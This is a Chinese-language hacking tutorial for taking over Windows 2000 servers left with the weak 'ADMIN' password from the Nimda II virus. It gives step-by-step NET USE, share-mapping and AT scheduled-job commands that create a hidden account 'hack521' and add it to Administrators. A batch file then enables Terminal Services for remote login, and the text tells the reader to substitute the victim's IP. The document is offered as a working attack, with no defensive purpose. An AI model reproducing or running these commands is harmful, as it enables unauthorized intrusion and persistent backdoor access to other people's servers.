在WINDOWS 2000的网络命令家族中，NET命令集和AT远程执行工具是最好的工具！
　　
　　目前，尼姆达II病毒仍然在互联网络上广为流传！
　　
　　我们就利用尼姆达II给我们带来的漏洞！
　　
　　结合NET命令集和AT远程执行工具把自己提升为系统管理员吧！
　　
　　首先，需要你的电脑上安装有Windows 2000 Server OR Professional
　　
　　其次，我们进入CMD（Windows 2000的命令提示符）
　　
　　（不知道如何进入命令提示符？）
　　
　　单击开始按钮，选择运行……，输入CMD，然后回车
　　
　　会看到一个窗口（DOS状态的）
　　
　　C:\>NET USE \\127.0.0.1\IPC$ "ADMIN" /USER:"ADMIN"
　　命令成功完成
　　C:\>NET USE X: \\127.0.0.1\C$
　　命令成功完成
　　C:\>NET TIME \\127.0.0.1 /SET
　　是否与\\127.0.0.1的时间一致？[Y/N]Y
　　命令成功完成
　　C:\>AT \\127.0.0.1 18:00 C:\WINNT\SYSTEM32\NET.EXE USER hack521 123 /ADD
　　计划成功添加 ID=1
　　C:\>AT \\127.0.0.1 18:02 C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP Administrators hack521 /ADD
　　计划成功添加 ID=2
　　
　　OK 我来解释一下！
　　
　　127.0.0.1是你本地的IP地址(没有上网的时候)，具体实战的时候替换成对方的网络IP！
　　
　　"ADMIN" /USER:"ADMIN" 这个是尼姆达II病毒制造的弱口令！权限为SYSTEM！
　　
　　NET TIME \\127.0.0.1 /SET 将本地时间与服务器时间同步！
　　
　　两行AT命令是分别在18:00与18:02执行服务器的两个NET命令
　　
　　前一个是创建一个用户，后面的是将用户提升为系统管理员
　　
　　这样，我们以后就可以用hack521这个用户访问这台服务器了！
　　
　　黑客的目的不仅仅是要提升自己为系统管理员而已，还要完全控制整台服务器！
　　
　　我们仍然在命令提示符下面（CMD状态）
　　
　　C:\>COPY CON hack.bat
　　@ECHO TSEnable = on > C:\sql^Z
　　1 个文件拷贝完成
　　C:\>COPY hack.bat X:1 个文件拷贝完成
　　C:\>AT \\127.0.0.1 18:30 C:\hack.bat
　　计划成功添加 ID=1
　　C:\>AT \\127.0.0.1 18:32 C:\WINNT\SYSTEM32\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
　　计划成功添加 ID=1
　　c:\>
　　
　　OK 我来解释一下！
　　
　　COPY CON hack.bat是创建一个批处理，输入命令的时候一定要小心，错了就得重新来一遍！
　　
　　（如果notepad使用熟练的话，可以使用notepad编辑）
　　
　　X:是映射的本地驱动器，盘符是自己定义的（不与本地驱动器同名即可）
　　
　　两行AT命令是分别在18:30与18:32执行服务器的两个外部程序
　　
　　前一个是执行我们创建的那个批处理程序，后面的是调用系统服务管理，启动远程管理功能
　　
　　执行后，你不要着急连接远程管理功能，因为服务器正在重新启动中，得等一段时间！
　　
　　大约5-6分钟以后，就可以使用了！
　　
　　使用WinCtrl软件（关于WinCtrl的使用方法，看软件的帮助）连接上服务器！
　　
　　当看到登录屏幕的时候，使用刚才创建的hack521用户登录吧！